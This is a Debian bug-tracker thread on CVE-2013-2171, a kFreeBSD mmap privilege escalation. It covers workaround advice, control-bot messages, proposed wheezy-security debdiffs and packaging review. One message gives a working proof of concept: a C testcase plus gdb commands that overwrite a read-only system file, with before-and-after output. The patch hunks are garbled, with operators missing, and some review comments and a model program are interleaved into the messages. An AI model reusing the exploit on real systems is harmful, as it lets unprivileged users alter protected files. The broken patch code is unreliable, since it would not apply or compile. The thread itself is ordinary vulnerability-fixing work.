Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap

2013-06-21 Thread Christoph Egger
Steven Chamberlain <ste...@pyro.eu.org> writes:
> Please could you do an upload of SVN r4525 to unstable?

I guess you mean 4523? or some special branch?

Christoph


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap

2013-06-21 Thread Steven Chamberlain
On 21/06/13 09:56, Christoph Egger wrote:
> Steven Chamberlain <ste...@pyro.eu.org> writes:
>> Please could you do an upload of SVN r4525 to unstable?
>
> I guess you mean 4523? or some special branch?

Actually yes I meant r4523, although the more recent commits didn't
change anything in /trunk/kfreebsd-9.

Regards,
-- 
Steven Chamberlain
ste...@pyro.eu.org





Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap

2013-06-20 Thread Steven Chamberlain
A suggested workaround on vulnerable systems is:
sysctl security.bsd.unprivileged_proc_debug=0

(which works by disabling some functionality of GDB to non-root users)

Also the use of jails or securelevel could reduce the potential damage.

Regards,
-- 
Steven Chamberlain
ste...@pyro.eu.org





Processed: Re: Bug#712664: Info received (Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap)

2013-06-20 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 forwarded 712664 
 http://security.freebsd.org/advisories/FreeBSD-SA-13:06.mmap.asc
Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation 
via mmap
Set Bug forwarded-to-address to 
'http://security.freebsd.org/advisories/FreeBSD-SA-13:06.mmap.asc'.
 clone 712664 -1
Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation 
via mmap
Bug 712664 cloned as bug 712892
 reassign -1 src:kfreebsd-10
Bug #712892 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation 
via mmap
Bug reassigned from package 'src:kfreebsd-9' to 'src:kfreebsd-10'.
No longer marked as found in versions kfreebsd-9/9.0-11 and 
kfreebsd-9/9.0~svn223109-0.1.
Ignoring request to alter fixed versions of bug #712892 to the same values 
previously set
 retitle -1 kfreebsd-10: CVE-2013-2171: Privilege escalation via mmap
Bug #712892 [src:kfreebsd-10] kfreebsd-9: CVE-2013-2171: Privilege escalation 
via mmap
Changed Bug title to 'kfreebsd-10: CVE-2013-2171: Privilege escalation via 
mmap' from 'kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap'
 # not a real package version, but it or any later version will fix this
 fixed -1 kfreebsd-10/10.0~svn251901-1
Bug #712892 [src:kfreebsd-10] kfreebsd-10: CVE-2013-2171: Privilege escalation 
via mmap
The source kfreebsd-10 and version 10.0~svn251901-1 do not appear to match any 
binary packages
Marked as fixed in versions kfreebsd-10/10.0~svn251901-1.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
712664: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712664
712892: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712892
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems





Processed: Re: Bug#712664: Info received (Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap)

2013-06-20 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 found 712664 10.0~svn242489-1
Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation 
via mmap
The source 'kfreebsd-9' and version '10.0~svn242489-1' do not appear to match 
any binary packages
Marked as found in versions kfreebsd-9/10.0~svn242489-1.
 found 712664 10.0~svn225709-1
Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation 
via mmap
The source 'kfreebsd-9' and version '10.0~svn225709-1' do not appear to match 
any binary packages
Marked as found in versions kfreebsd-9/10.0~svn225709-1.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
712664: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712664
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems





Processed: Re: Bug#712664: Info received (Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap)

2013-06-20 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 # grrr
 notfound 712664 10.0~svn242489-1
Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation 
via mmap
The source 'kfreebsd-9' and version '10.0~svn242489-1' do not appear to match 
any binary packages
No longer marked as found in versions kfreebsd-9/10.0~svn242489-1.
 notfound 712664 10.0~svn225709-1
Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation 
via mmap
The source 'kfreebsd-9' and version '10.0~svn225709-1' do not appear to match 
any binary packages
No longer marked as found in versions kfreebsd-9/10.0~svn225709-1.
 found 712892 10.0~svn242489-1
Bug #712892 [src:kfreebsd-10] kfreebsd-10: CVE-2013-2171: Privilege escalation 
via mmap
Marked as found in versions kfreebsd-10/10.0~svn242489-1.
 found 712892 10.0~svn225709-1
Bug #712892 [src:kfreebsd-10] kfreebsd-10: CVE-2013-2171: Privilege escalation 
via mmap
Marked as found in versions kfreebsd-10/10.0~svn225709-1.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
712664: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712664
712892: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712892
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems





Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap

2013-06-19 Thread Steven Chamberlain
Hi Christoph,

Please could you do an upload of SVN r4525 to unstable?

kfreebsd-9 as shipped with wheezy is indeed vulnerable and I can confirm
now that the fix works too.

Unfortunately the vulnerability is as simple and as serious as it
sounds.  A non-privileged user can overwrite any file having only read
permissions.

# cat /etc/foo
steven:x:1000:1000:,,,:/home/steven:/bin/bash

$ gdb testcase

(gdb) run
Program received signal SIGSEGV, Segmentation fault.
0x00400631 in main () at main.c:13
13  *ptr = 0; /* this will segfault */
(gdb) set {char}(ptr+9) = 0x30
(gdb)

# cat /etc/foo
steven:x::1000:,,,:/home/steven:/bin/bash

Regards,
-- 
Steven Chamberlain
ste...@pyro.eu.org
#include <stdio.h>
#include <errno.h>
#include <unistd.h>
#include <sys/mman.h>

int main() {
    FILE *fp = fopen("/etc/foo", "r"); /* file is opened read-only */
    int fd = fp ? fileno (fp) : -1; /* a failed open makes mmap fail below */

    unsigned char *ptr = mmap (NULL, 4096, PROT_READ, MAP_SHARED, fd, 0); /* shared, read-only mapping */
    if (ptr == MAP_FAILED) return -1;

    *ptr = 0; /* this will segfault */
    return 0;
}
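
The check that the SA-13_06.mmap.patch quoted in this thread adds to vm_map.c, modelled in user-space C as an added example (not part of the original messages and not FreeBSD code). The flag values, the map_file() rules for how a mapping gets its max_protection and COW flag, and the assumption that a tracer's write arrives as a fault with VM_PROT_COPY set are simplifications made for this model.

```c
/* User-space model of the condition added by SA-13_06.mmap.patch.
 * Not kernel code: numeric values below are stand-ins for this model. */
#include <stdio.h>

enum { PROT_R = 0x1, PROT_W = 0x2, PROT_COPY = 0x8 }; /* VM_PROT_READ/WRITE/COPY */
enum { ENTRY_COW = 0x4 };                             /* MAP_ENTRY_COW */
enum { OK = 0, PROTECTION_FAILURE = 2 };              /* KERN_* style results */

struct entry { int max_protection; int eflags; };

/* Assumed mapping rules: a private file mapping is copy-on-write and may be
 * made writable; a shared one may only if the descriptor allows writing. */
static struct entry map_file(int shared, int fd_writable)
{
    struct entry e = { PROT_R, 0 };
    if (!shared) {
        e.max_protection |= PROT_W;
        e.eflags |= ENTRY_COW;
    } else if (fd_writable) {
        e.max_protection |= PROT_W;
    }
    return e;
}

/* The added test: a copy-type fault is refused when the entry can never be
 * writable and is not copy-on-write, i.e. the write would reach the file. */
static int lookup_patched(int fault_type, const struct entry *e)
{
    if ((fault_type & PROT_COPY) != 0 &&
        (e->max_protection & PROT_W) == 0 &&
        (e->eflags & ENTRY_COW) == 0)
        return PROTECTION_FAILURE;
    return OK;
}

/* Outcome of a tracer write into a mapping created with these properties. */
static int tracer_write(int shared, int fd_writable)
{
    struct entry e = map_file(shared, fd_writable);
    return lookup_patched(PROT_COPY | PROT_R, &e);
}

int main(void)
{
    /* First row is the testcase above: MAP_SHARED on a file opened "r". */
    printf("shared,  fd read-only : %d\n", tracer_write(1, 0));
    printf("shared,  fd writable  : %d\n", tracer_write(1, 1));
    printf("private, fd read-only : %d\n", tracer_write(0, 0));
    return 0;
}
```

Only the first case is refused; private mappings stay writable for a debugger because the write lands in a private copy rather than in the file.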


Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap

2013-06-19 Thread Steven Chamberlain
Attached are proposed debdiffs for an upload to wheezy-security, based
on the version currently in wheezy.

The versioning scheme for the last security upload (with +deb70.$n)
looks a bit weird to me (and it has lower value than the next changelog
entry).  So I also attach a second debdiff, proposing a different form.

Please could someone with the necessary access, open a security.d.o RT
ticket asking permission to upload whichever one of these, and for a DSA
to be issued?

Thanks!
Regards,
-- 
Steven Chamberlain
ste...@pyro.eu.org
diff -Nru kfreebsd-9-9.0/debian/changelog kfreebsd-9-9.0/debian/changelog
--- kfreebsd-9-9.0/debian/changelog 2013-05-01 13:59:20.0 +0100
+++ kfreebsd-9-9.0/debian/changelog 2013-06-19 20:49:15.0 +0100
@@ -1,3 +1,17 @@
+kfreebsd-9 (9.0-10+deb70.2) wheezy-security; urgency=high
+
+  * Upload for wheezy-security
+
+ -- Steven Chamberlain ste...@pyro.eu.org  Wed, 19 Jun 2013 20:36:54 +0100
+
+kfreebsd-9 (9.0-12) unstable; urgency=high
+
+  * Team upload.
+  * Pick SVN 251902 from FreeBSD 9-STABLE to fix SA-13:06 / CVE-2013-2171:
+Privilege escalation via mmap (Closes: #712664)
+
+ -- Steven Chamberlain ste...@pyro.eu.org  Tue, 18 Jun 2013 13:20:50 +0100
+
 kfreebsd-9 (9.0-10+deb70.1) wheezy-security; urgency=high
 
   * Upload for wheezy-security
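Review bot: The new top entry 9.0-10+deb70.2 says only "Upload for wheezy-security" and leaves the fix description and the Closes: #712664 in the unstable 9.0-12 stanza beneath it, which also puts a lower version above a higher one in the changelog. For a wheezy-security debdiff, drop the 9.0-12 stanza and move the "Pick SVN 251902 ..." item and the Closes into the 9.0-10+deb70.2 entry, so the diff is purely against 9.0-10+deb70.1.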
diff -Nru kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch 
kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch
--- kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch   1970-01-01 
01:00:00.0 +0100
+++ kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch   2013-06-19 
20:49:15.0 +0100
@@ -0,0 +1,28 @@
+Description:
+ Fix a bug that allowed a tracing process (e.g. gdb) to write
+ to a memory-mapped file in the traced process's address space
+ even if neither the traced process nor the tracing process had
+ write access to that file. [13:06]
+ (CVE-2013-2171)
+Origin: vendor, http://security.freebsd.org/patches/SA-13:06/mmap.patch
+Bug: http://security.freebsd.org/advisories/FreeBSD-SA-13:06.mmap.asc
+Bug-Debian: http://bugs.debian.org/712664
+Applied-Upstream: http://svnweb.freebsd.org/base?view=revisionrevision=251902
+
+Index: kfreebsd-9-9.0/sys/vm/vm_map.c
+===
+--- kfreebsd-9-9.0.orig/sys/vm/vm_map.c2011-07-06 21:06:44.0 
+0100
 kfreebsd-9-9.0/sys/vm/vm_map.c 2013-06-18 13:39:13.104790989 +0100
+@@ -3704,6 +3704,12 @@
+   vm_map_unlock_read(map);
+   return (KERN_PROTECTION_FAILURE);
+   }
++  if ((fault_typea  VM_PROT_COPY) != 0 
++  (entry-max_protection  VM_PROT_WRITE) == 0 
++  (entry-eflags  MAP_ENTRY_COW) == 0) {
++  vm_map_unlock_read(map);
++  return (KERN_PROTECTION_FAILURE);
++  }
+ 
+   /*
+* If this page is not pageable, we have to get it for all possible
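Review bot: In the embedded vm_map.c hunk the three added condition lines read "fault_typea  VM_PROT_COPY", "entry-max_protection  VM_PROT_WRITE" and "entry-eflags  MAP_ENTRY_COW" with no operators between the operands, and the inner file header has lost its "+++" marker, so the patch as shown here would neither apply nor compile. Before upload, compare debian/patches/SA-13_06.mmap.patch byte for byte with the mmap.patch named in the Origin field. Two smaller points on the header: the Description field has no one-line synopsis on its first line, and the Applied-Upstream URL runs "view=revision" and "revision=251902" together without a separator.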
diff -Nru kfreebsd-9-9.0/debian/patches/series 
kfreebsd-9-9.0/debian/patches/series
--- kfreebsd-9-9.0/debian/patches/series2013-05-01 13:21:35.0 
+0100
+++ kfreebsd-9-9.0/debian/patches/series2013-06-19 20:49:15.0 
+0100
@@ -9,6 +9,7 @@
 svn239447_SCTP_DoS.patch
 SA-12_08.linux.patch
 SA-13_05.nfsserver.patch
+SA-13_06.mmap.patch
 
 # Other patches that might or might not be mergeable
 001_misc.diff
diff -Nru kfreebsd-9-9.0/debian/changelog kfreebsd-9-9.0/debian/changelog
--- kfreebsd-9-9.0/debian/changelog 2013-05-01 13:59:20.0 +0100
+++ kfreebsd-9-9.0/debian/changelog 2013-06-19 21:12:56.0 +0100
@@ -1,3 +1,11 @@
+kfreebsd-9 (9.0-12~deb7u1) wheezy-security; urgency=high
+
+  * Team upload.
+  * Pick SVN 251902 from FreeBSD 9-STABLE to fix SA-13:06 / CVE-2013-2171:
+Privilege escalation via mmap (Closes: #712664)
+
+ -- Steven Chamberlain ste...@pyro.eu.org  Tue, 18 Jun 2013 13:20:50 +0100
+
 kfreebsd-9 (9.0-10+deb70.1) wheezy-security; urgency=high
 
   * Upload for wheezy-security
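Review bot: The trailer of the 9.0-12~deb7u1 entry carries Tue, 18 Jun 2013 13:20:50, identical to the unstable 9.0-12 trailer in the other debdiff, while the file header shows this changelog was edited on 2013-06-19 21:12; refresh the trailer date for the security upload. The ~deb7u1 suffix sorts above 9.0-10+deb70.1 and below 9.0-12, which is fine for a stable update, but it reads as a rebuild of 9.0-12, so the entry should only be used if 9.0-12 goes to unstable with this same change.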
diff -Nru kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch 
kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch
--- kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch   1970-01-01 
01:00:00.0 +0100
+++ kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch   2013-06-19 
20:49:15.0 +0100
@@ -0,0 +1,28 @@
+Description:
+ Fix a bug that allowed a tracing process (e.g. gdb) to write
+ to a memory-mapped file in the traced process's address space
+ even if neither the traced process nor the tracing process had
+ write access to that file. [13:06]
+ (CVE-2013-2171)
+Origin: vendor, http://security.freebsd.org/patches/SA-13:06/mmap.patch
+Bug: http://security.freebsd.org/advisories/FreeBSD-SA-13:06.mmap.asc
+Bug-Debian: http://bugs.debian.org/712664
+Applied-Upstream: http://svnweb.freebsd.org/base?view=revisionrevision=251902
+
+Index: kfreebsd-9-9.0/sys/vm/vm_map.c
+===
+--- kfreebsd-9-9.0.orig/sys/vm/vm_map.c2011-07-06 21:06:44.0 
+0100

Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap

2013-06-19 Thread Salvatore Bonaccorso
Hi Steven,

Cc'ing team@security.d.o

On Wed, Jun 19, 2013 at 09:23:49PM +0100, Steven Chamberlain wrote:
> Attached are proposed debdiffs for an upload to wheezy-security, based
> on the version currently in wheezy.

Thanks Steven and Christoph for working on this issue.

> The versioning scheme for the last security upload (with +deb70.$n)
> looks a bit weird to me (and it has lower value than the next changelog
> entry).  So I also attach a second debdiff, proposing a different form.

Debdiff should be based on current wheezy(-security) version, so make
the debdiff part for the changelog (i.e. without the unstable
changelog part):

 diff -Nru kfreebsd-9-9.0/debian/changelog kfreebsd-9-9.0/debian/changelog
 --- kfreebsd-9-9.0/debian/changelog   2013-05-01 13:59:20.0 +0100
 +++ kfreebsd-9-9.0/debian/changelog   2013-06-19 20:49:15.0 +0100
 @@ -1,3 +1,17 @@
 +kfreebsd-9 (9.0-10+deb70.2) wheezy-security; urgency=high
 +
 +  * Team upload.
 +  * Upload for wheezy-security
 +  * Pick SVN 251902 from FreeBSD 9-STABLE to fix SA-13:06 / CVE-2013-2171:
 +Privilege escalation via mmap (Closes: #712664)
 +
 + -- Steven Chamberlain ste...@pyro.eu.org  Wed, 19 Jun 2013 20:36:54 +0100
 +
  kfreebsd-9 (9.0-10+deb70.1) wheezy-security; urgency=high
  
* Upload for wheezy-security
[...]

The versioning is indeed a bit ugly (preferred would have been also
for the previous one +deb7uX, and incrementing X, there is a pending
update for dev-ref describing this, see [1]).

 [1] http://bugs.debian.org/709218

> Please could someone with the necessary access, open a security.d.o RT
> ticket asking permission to upload whichever one of these, and for a DSA
> to be issued?

Small remark on this one: You also can do that in every case, no
necessary permissions for RT are needed: write a mail to
secur...@rt.debian.org with subject containing [Debian RT], see [2].

 [2] http://wiki.debian.org/rt.debian.org#Security_Team

Regards,
Salvatore





Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap

2013-06-18 Thread Steven Chamberlain
Source: kfreebsd-9
Version: 9.0-11
Severity: grave
Tags: security upstream
Control: found -1 kfreebsd-9/9.0~svn223109-0.1

Privilege escalation via mmap:
http://security.freebsd.org/advisories/FreeBSD-SA-13:06.mmap.asc

This was introduced by r199819 when FreeBSD 9 was the SVN head.  As such
it affects 9.0 as well as 10.0 snapshots before today; I'm preparing a
backport from 9-STABLE.

-- System Information:
Debian Release: wheezy/sid
  APT prefers testing
  APT policy: (500, 'testing'), (1, 'experimental')
Architecture: kfreebsd-amd64 (x86_64)

Kernel: kFreeBSD 9.0-2-amd64
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages kfreebsd-image-9.0-2-amd64 depends on:
ii  devd   9.0+ds1-9
ii  freebsd-utils  9.0+ds1-9
ii  kbdcontrol 9.0+ds1-9
ii  kldutils   9.0+ds1-9

kfreebsd-image-9.0-2-amd64 recommends no packages.

kfreebsd-image-9.0-2-amd64 suggests no packages.

-- no debconf information





Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap

2013-06-18 Thread Steven Chamberlain
Control: tags -1 pending

This is staged in SVN trunk as r4525, intended for upload to unstable
very soon (and then we should request a DSA for wheezy).  I'd like to
know first that the fix is really working and didn't break anything.
All I know yet is that it builds.

p.s. I didn't see any SVN commit mails from Alioth, I wonder if
something there is broken...

Regards,
-- 
Steven Chamberlain
ste...@pyro.eu.org





Processed: Re: Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap

2013-06-18 Thread Debian Bug Tracking System
Processing control commands:

 tags -1 pending
Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation 
via mmap
Added tag(s) pending.

-- 
712664: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712664
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems





Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap

2013-06-18 Thread Christoph Egger
Hi!

Steven Chamberlain <ste...@pyro.eu.org> writes:
> This is staged in SVN trunk as r4525, intended for upload to unstable
> very soon (and then we should request a DSA for wheezy).  I'd like to
> know first that the fix is really working and didn't break anything.
> All I know yet is that it builds.

I can probably install it on the 2 kfreebsd-amd64 production systems
here for testing tomorrow if you want. Also, feel free to ping me wrt
upload.

Christoph

-- 
9FED 5C6C E206 B70A 5857  70CA 9655 22B9 D49A E731
Debian Developer | Lisp Hacker | CaCert Assurer

